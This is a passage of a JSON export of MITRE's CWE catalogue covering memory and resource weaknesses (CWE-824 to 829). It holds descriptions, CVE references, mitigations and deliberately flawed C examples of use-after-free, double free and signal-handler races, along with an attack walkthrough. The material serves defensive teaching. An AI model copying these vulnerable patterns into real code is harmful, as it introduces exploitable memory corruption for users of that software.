chains.","attr":{"@_Type":"Maintenance"}},{"#text":"Many weaknesses related to pointer dereferences fall under the general term of \\"memory corruption\\" or \\"memory safety.\\" As of September 2010, there is no commonly-used terminology that covers the lower-level variants.","attr":{"@_Type":"Terminology"}},{"#text":"Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-09-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"824":{"attr":{"@_ID":"824","@_Name":"Access of Uninitialized Pointer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program accesses or uses a pointer that has not been initialized.","Extended_Description":{"xhtml:p":["If the pointer contains an uninitialized value, then the value might not point to a valid memory location. This could cause the program to read from or write to unexpected memory locations, leading to a denial of service. If the uninitialized pointer is used as a function call, then arbitrary functions could be invoked. If an attacker can influence the portion of uninitialized memory that is contained in the pointer, this weakness could be leveraged to execute code or perform other attacks.","Depending on memory layout, associated memory management behaviors, and program operation, the attacker might be able to influence the contents of the uninitialized pointer, thus gaining more fine-grained control of the memory location to be accessed."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"If the uninitialized pointer is used in a read operation, an attacker might be able to read sensitive portions of memory."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If the uninitialized pointer references a memory location that is not accessible to the program, or points to a location that is \\"malformed\\" (such as NULL) or larger than expected by a read or write operation, then a crash may occur."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If the uninitialized pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-0211","Description":"chain: unchecked return value (CWE-252) leads to free of invalid, uninitialized pointer (CWE-824).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0211"},{"Reference":"CVE-2009-2768","Description":"Pointer in structure is not initialized, leading to NULL pointer dereference (CWE-476) and system crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2768"},{"Reference":"CVE-2009-1721","Description":"Free of an uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1721"},{"Reference":"CVE-2009-1415","Description":"Improper handling of invalid signatures leads to free of invalid pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1415"},{"Reference":"CVE-2009-0846","Description":"Invalid encoding triggers free of uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0846"},{"Reference":"CVE-2009-0040","Description":"Crafted PNG image leads to free of uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0040"},{"Reference":"CVE-2008-2934","Description":"Crafted GIF image leads to free of uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2934"},{"Reference":"CVE-2007-4682","Description":"Access of uninitialized pointer might lead to code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4682"},{"Reference":"CVE-2007-4639","Description":"Step-based manipulation: invocation of debugging function before the primary initialization function leads to access of an uninitialized pointer and code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4639"},{"Reference":"CVE-2007-4000","Description":"Unchecked return values can lead to a write to an uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4000"},{"Reference":"CVE-2007-2442","Description":"zero-length input leads to free of uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442"},{"Reference":"CVE-2007-1213","Description":"Crafted font leads to uninitialized function pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1213"},{"Reference":"CVE-2006-6143","Description":"Uninitialized function pointer in freed memory is invoked","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6143"},{"Reference":"CVE-2006-4175","Description":"LDAP server mishandles malformed BER queries, leading to free of uninitialized memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4175"},{"Reference":"CVE-2006-0054","Description":"Firewall can crash with certain ICMP packets that trigger access of an uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0054"},{"Reference":"CVE-2003-1201","Description":"LDAP server does not initialize members of structs, which leads to free of uninitialized pointer if an LDAP request fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1201"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Variable Initialization&#34;, Page 312"}}},"Notes":{"Note":[{"#text":"There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains.","attr":{"@_Type":"Maintenance"}},{"#text":"Many weaknesses related to pointer dereferences fall under the general term of \\"memory corruption\\" or \\"memory safety.\\" As of September 2010, there is no commonly-used terminology that covers the lower-level variants.","attr":{"@_Type":"Terminology"}},{"#text":"Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-09-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"825":{"attr":{"@_ID":"825","@_Name":"Expired Pointer Dereference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program dereferences a pointer that contains a location for memory that was previously valid, but is no longer valid.","Extended_Description":"When a program releases memory, but it maintains a pointer to that memory, then the memory might be re-allocated at a later time. If the original pointer is accessed to read or write data, then this could cause the program to read or modify data that is in use by a different function or process. Depending on how the newly-allocated memory is used, this could lead to a denial of service, information exposure, or code execution.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Dangling pointer"}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"If the expired pointer is used in a read operation, an attacker might be able to control data read in by the application."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If the expired pointer references a memory location that is not accessible to the program, or points to a location that is \\"malformed\\" (such as NULL) or larger than expected by a read or write operation, then a crash may occur."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If the expired pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Choose a language that provides automatic memory management."},{"Phase":"Implementation","Description":"When freeing pointers, be sure to set them to NULL once they are freed. However, the utilization of multiple or complex data structures may lower the usefulness of this strategy."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-71"},"Intro_Text":"The following code shows a simple example of a use after free error:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);if (err) {}...if (abrt) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"abrt = 1;free(ptr);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logError(\\"operation aborted before commit\\", ptr);","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"When an error occurs, the pointer is immediately freed. However, this pointer is later incorrectly used in the logError function."},{"attr":{"@_Demonstrative_Example_ID":"DX-72"},"Intro_Text":"The following code shows a simple example of a double free error:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);...if (abrt) {}...free(ptr);","xhtml:br":["","","",""],"xhtml:div":{"#text":"free(ptr);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":["Double free vulnerabilities have two common (and sometimes overlapping) causes:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Error conditions and other exceptional circumstances"},{"xhtml:div":"Confusion over which part of the program is responsible for freeing the memory"}]}},"Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-5013","Description":"access of expired memory address leads to arbitrary code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5013"},{"Reference":"CVE-2010-3257","Description":"stale pointer issue leads to denial of service and possibly other consequences","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3257"},{"Reference":"CVE-2008-0062","Description":"Chain: a message having an unknown message type may cause a reference to uninitialized memory resulting in a null pointer dereference (CWE-476) or dangling pointer (CWE-825), possibly crashing the system or causing heap corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062"},{"Reference":"CVE-2007-1211","Description":"read of value at an offset into a structure after the offset is no longer valid","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1211"}]},"Notes":{"Note":[{"#text":"There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains.","attr":{"@_Type":"Maintenance"}},{"#text":"Many weaknesses related to pointer dereferences fall under the general term of \\"memory corruption\\" or \\"memory safety.\\" As of September 2010, there is no commonly-used terminology that covers the lower-level variants.","attr":{"@_Type":"Terminology"}},{"#text":"Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-09-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"}]}},"826":{"attr":{"@_ID":"826","@_Name":"Premature Release of Resource During Expected Lifetime","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program releases a resource that is still intended to be used by the program itself or another actor.","Extended_Description":{"xhtml:p":["This weakness focuses on errors in which the program should not release a resource, but performs the release anyway. This is different than a weakness in which the program releases a resource at the appropriate time, but it maintains a reference to the resource, which it later accesses. For this weakness, the resource should still be valid upon the subsequent access.","When a program releases a resource that is still being used, it is possible that operations will still be taken on this resource, which may have been repurposed in the meantime, leading to issues similar to CWE-825. Consequences may include denial of service, information exposure, or code execution."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"666","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"672","@_View_ID":"1000"}}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Memory"],"Note":"If the released resource is subsequently reused or reallocated, then a read operation on the original resource might access sensitive data that is associated with a different user or entity."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"When the resource is released, the software might modify some of its structure, or close associated channels (such as a file descriptor). When the software later accesses the resource as if it is valid, the resource might not be in an expected state, leading to resultant errors that may lead to a crash."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Modify Application Data","Modify Memory"],"Note":"When the resource is released, the software might modify some of its structure. This might affect program logic in the sections of code that still assume the resource is active. If the released resource is related to memory and is used in a function call, or points to unexpected data in a write operation, then code execution may be possible upon subsequent accesses."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-3547","Description":"chain: race condition might allow resource to be released before operating on it, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547"}},"Notes":{"Note":{"#text":"Under-studied and under-reported as of September 2010. This weakness has been reported in high-visibility software, although the focus has been primarily on memory allocation and de-allocation. There are very few examples of this weakness that are not directly related to memory management, although such weaknesses are likely to occur in real-world software for other types of resources.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-09-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"}]}},"827":{"attr":{"@_ID":"827","@_Name":"Improper Control of Document Type Definition","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not restrict a reference to a Document Type Definition (DTD) to the intended control sphere. This might allow attackers to reference arbitrary DTDs, possibly causing the software to expose files, consume excessive system resources, or execute arbitrary http requests on behalf of the attacker.","Extended_Description":{"xhtml:p":["As DTDs are processed, they might try to read or include files on the machine performing the parsing. If an attacker is able to control the DTD, then the attacker might be able to specify sensitive resources or requests or provide malicious content.","For example, the SOAP specification prohibits SOAP messages from containing DTDs."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"829","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"776","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"XML","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"If the attacker is able to include a crafted DTD and a default entity resolver is enabled, the attacker may be able to access arbitrary files on the system."},{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"The DTD may cause the parser to consume excessive CPU cycles or memory using techniques such as nested or recursive entity references (CWE-776)."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity"],"Note":"The DTD may include arbitrary HTTP requests that the server may execute. This could lead to other attacks leveraging the server\'s trust relationship with other entities."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2010-2076","Description":"Product does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2076"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-773"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-10-25"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"828":{"attr":{"@_ID":"828","@_Name":"Signal Handler with Functionality that is not Asynchronous-Safe","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software defines a signal handler that contains code sequences that are not asynchronous-safe, i.e., the functionality is not reentrant, or it can be interrupted.","Extended_Description":{"xhtml:p":["This can lead to an unexpected system state with a variety of potential consequences depending on context, including denial of service and code execution.","Signal handlers are typically intended to interrupt normal functionality of a program, or even other signals, in order to notify the process of an event. When a signal handler uses global or static variables, or invokes functions that ultimately depend on such state or its associated metadata, then it could corrupt system state that is being used by normal functionality. This could subject the program to race conditions or other weaknesses that allow an attacker to cause the program state to be corrupted. While denial of service is frequently the consequence, in some cases this weakness could be leveraged for code execution.","There are several different scenarios that introduce this issue:","Note that in some environments or contexts, it might be possible for the signal handler to be interrupted itself.","If both a signal handler and the normal behavior of the software have to operate on the same set of state variables, and a signal is received in the middle of the normal execution\'s modifications of those variables, the variables may be in an incorrect or corrupt state during signal handler execution, and possibly still incorrect or corrupt upon return."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Invocation of non-reentrant functions from within the handler. One example is malloc(), which modifies internal global variables as it manages memory. Very few functions are actually reentrant.","Code sequences (not necessarily function calls) contain non-atomic use of global variables, or associated metadata or structures, that can be accessed by other functionality of the program, including other signal handlers. Frequently, the same function is registered to handle multiple signals.","The signal handler function is intended to run at most one time, but instead it can be invoked multiple times. This could happen by repeated delivery of the same signal, or by delivery of different signals that have the same handler function (CWE-831)."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"364","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"],"Note":"The most common consequence will be a corruption of the state of the software, possibly leading to a crash or exit. However, if the signal handler is operating on state variables for security relevant libraries or protection mechanisms, the consequences can be far more severe, including protection mechanism bypass, privilege escalation, or information exposure."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","Architecture and Design"],"Description":{"xhtml:p":["Eliminate the usage of non-reentrant functionality inside of signal handlers. This includes replacing all non-reentrant library calls with reentrant calls.","Note: This will not always be possible and may require large portions of the software to be rewritten or even redesigned. Sometimes reentrant-safe library alternatives will not be available. Sometimes non-reentrant interaction between the state of the system and the signal handler will be required by design."]},"Effectiveness":"High"},{"Phase":"Implementation","Description":"Where non-reentrant functionality must be leveraged within a signal handler, be sure to block or mask signals appropriately. This includes blocking other signals within the signal handler itself that may also leverage the functionality. It also includes blocking all signals reliant upon the functionality when it is being accessed or modified by the normal behaviors of the software."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-26"},"Intro_Text":"This code registers the same signal handler function with two different signals (CWE-831). If those signals are sent to the process, the handler creates a log message (specified in the first argument to the program) and exits.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *logMessage;void handler (int sigNum) {}int main (int argc, char* argv[]) {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"syslog(LOG_NOTICE, \\"%s\\\\n\\", logMessage);free(logMessage);sleep(10);exit(0);","xhtml:br":["","","","",""],"xhtml:i":"/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"logMessage = strdup(argv[1]);signal(SIGHUP, handler);signal(SIGTERM, handler);sleep(10);","xhtml:br":["","","","","","",""],"xhtml:i":["/* Register signal handlers. */","/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"]}}]}},"Body_Text":["The handler function uses global state (globalVar and logMessage), and it can be called by both the SIGHUP and SIGTERM signals. An attack scenario might follow these lines:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"The program begins execution, initializes logMessage, and registers the signal handlers for SIGHUP and SIGTERM."},{"xhtml:div":"The program begins its \\"normal\\" functionality, which is simplified as sleep(), but could be any functionality that consumes some time."},{"xhtml:div":"The attacker sends SIGHUP, which invokes handler (call this \\"SIGHUP-handler\\")."},{"xhtml:div":"SIGHUP-handler begins to execute, calling syslog()."},{"xhtml:div":"syslog() calls malloc(), which is non-reentrant. malloc() begins to modify metadata to manage the heap."},{"xhtml:div":"The attacker then sends SIGTERM."},{"xhtml:div":"SIGHUP-handler is interrupted, but syslog\'s malloc call is still executing and has not finished modifying its metadata."},{"xhtml:div":"The SIGTERM handler is invoked."},{"xhtml:div":"SIGTERM-handler records the log message using syslog(), then frees the logMessage variable."}]}},"At this point, the state of the heap is uncertain, because malloc is still modifying the metadata for the heap; the metadata might be in an inconsistent state. The SIGTERM-handler call to free() is assuming that the metadata is inconsistent, possibly causing it to write data to the wrong location while managing the heap. The result is memory corruption, which could lead to a crash or even code execution, depending on the circumstances under which the code is running.","Note that this is an adaptation of a classic example as originally presented by Michal Zalewski [REF-360]; the original example was shown to be exploitable for code execution.","Also note that the strdup(argv[1]) call contains a potential buffer over-read (CWE-126) if the program is called without any arguments, because argc would be 0, and argv[1] would point outside the bounds of the array."]},{"attr":{"@_Demonstrative_Example_ID":"DX-48"},"Intro_Text":"The following code registers a signal handler with multiple signals in order to log when a specific event occurs and to free associated memory before exiting.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;signal.h&gt;#include &lt;syslog.h&gt;#include &lt;string.h&gt;#include &lt;stdlib.h&gt;void *global1, *global2;char *what;void sh (int dummy) {}int main (int argc,char* argv[]) {}","xhtml:br":["","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"syslog(LOG_NOTICE,\\"%s\\\\n\\",what);free(global2);free(global1);sleep(10);exit(0);","xhtml:br":["","","","","",""],"xhtml:i":"/* Sleep statements added to expand timing window for race condition */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"what=argv[1];global1=strdup(argv[2]);global2=malloc(340);signal(SIGHUP,sh);signal(SIGTERM,sh);sleep(10);exit(0);","xhtml:br":["","","","","","","",""],"xhtml:i":"/* Sleep statements added to expand timing window for race condition */"}}]}},"Body_Text":["However, the following sequence of events may result in a double-free (CWE-415):",{"xhtml:ol":{"xhtml:li":[{"xhtml:div":"a SIGHUP is delivered to the process"},{"xhtml:div":"sh() is invoked to process the SIGHUP"},{"xhtml:div":"This first invocation of sh() reaches the point where global1 is freed"},{"xhtml:div":"At this point, a SIGTERM is sent to the process"},{"xhtml:div":"the second invocation of sh() might do another free of global1"},{"xhtml:div":"this results in a double-free (CWE-415)"}]}},"This is just one possible exploitation of the above code. As another example, the syslog call may use malloc calls which are not async-signal safe. This could cause corruption of the heap management structures. For more details, consult the example within \\"Delivering Signals for Fun and Profit\\" [REF-360]."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-4109","Description":"Signal handler uses functions that ultimately call the unsafe syslog/malloc/s*printf, leading to denial of service via multiple login attempts","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4109"},{"Reference":"CVE-2006-5051","Description":"Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition that leads to a double free (CWE-415).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5051"},{"Reference":"CVE-2001-1349","Description":"unsafe calls to library functions from signal handler","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1349"},{"Reference":"CVE-2004-0794","Description":"SIGURG can be used to remotely interrupt signal handler; other variants exist.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0794"},{"Reference":"CVE-2004-2259","Description":"SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259"},{"Reference":"CVE-2002-1563","Description":"SIGCHLD not blocked in a daemon loop while counter is modified, causing counter to get out of sync.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1563"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG31-C","Entry_Name":"Do not access or modify shared objects in signal handlers"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-360"}},{"attr":{"@_External_Reference_ID":"REF-361"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-11-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"829":{"attr":{"@_ID":"829","@_Name":"Inclusion of Functionality from Untrusted Control Sphere","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.","Extended_Description":{"xhtml:p":["When including third-party functionality, such as a web widget, library, or other source of functionality, the software must effectively trust that functionality. Without sufficient protection mechanisms, the functionality could be malicious in nature (either by coming from an untrusted source, being spoofed, or being modified in transit from a trusted source). The functionality might also contain its own weaknesses, or grant access to additional functionality and state information that should be kept private to the base system, such as system state information, 